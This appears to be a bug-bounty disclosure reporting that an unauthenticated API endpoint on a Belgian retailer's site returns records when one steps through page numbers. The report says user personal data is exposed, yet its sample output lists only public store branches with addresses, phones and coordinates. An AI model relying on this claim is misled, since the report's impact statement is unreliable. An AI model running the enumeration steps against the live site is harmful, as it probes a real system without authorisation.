User information disclosed via API endpoint

It appears that the requests for “system accounts” are fully available via an API endpoint that does not require authentication.

The main issue is that among the information disclosed are user ( “uid, name, address,phone Number, street, streetNumber, apartment, zipCode, city, , geoLocation, latitude, longitude, distance, slug )

Steps To Reproduce:

Navigate to the following URL: https://mijn.gamma.be/api/session-data/nearby-stores/201

note You can change pages 201–243 one by one. like

Here is an example object of what is returned from the endpoint:

[{“uid”:”668",”name”:”GAMMA Hasselt-Runkst”,”address”:{“street”:”Runkstersteenweg”,”streetNumber”:”245",”apartment”:””,”zipCode”:”3500",”city”:”HASSELT”,”phone”:”+32 11 283666"},”geoLocation”:{“latitude”:50.925085,”longitude”:5.3197},”distance”:2.93373162280325,”slug”:”hasselt-runkst”},{“uid”:”835",”name”:”GAMMA Genk-Hasseltweg”,”address”:{“street”:”Hasseltweg”,”streetNumber”:”196",”apartment”:””,”zipCode”:”3600",”city”:”GENK”,”phone”:”+32 89 410370"},”geoLocation”:{“latitude”:50.960724,”longitude”:5.454175},”distance”:7.86430226333355,”slug”:”genk-hasseltweg”},{“uid”:”237",”name”:”GAMMA Genk Driehoeven”,”address”:{“street”:”Gieterijstraat”,”streetNumber”:”8",”apartment”:””,”zipCode”:”3600",”city”:”GENK”,”phone”:”+32 89 842473"},”geoLocation”:{“latitude”:51.004547,”longitude”:5.491984},”distance”:12.1961682415492,”slug”:”genk-driehoeven”}]

Supporting Material/References:

Hackerone report: https://hackerone.com/reports/1218461

Impact :

A threat actor could view personal information about users on the platform.

It is also theoretically possible that a threat actor could use information gathered from this endpoint to identify future targets and footholds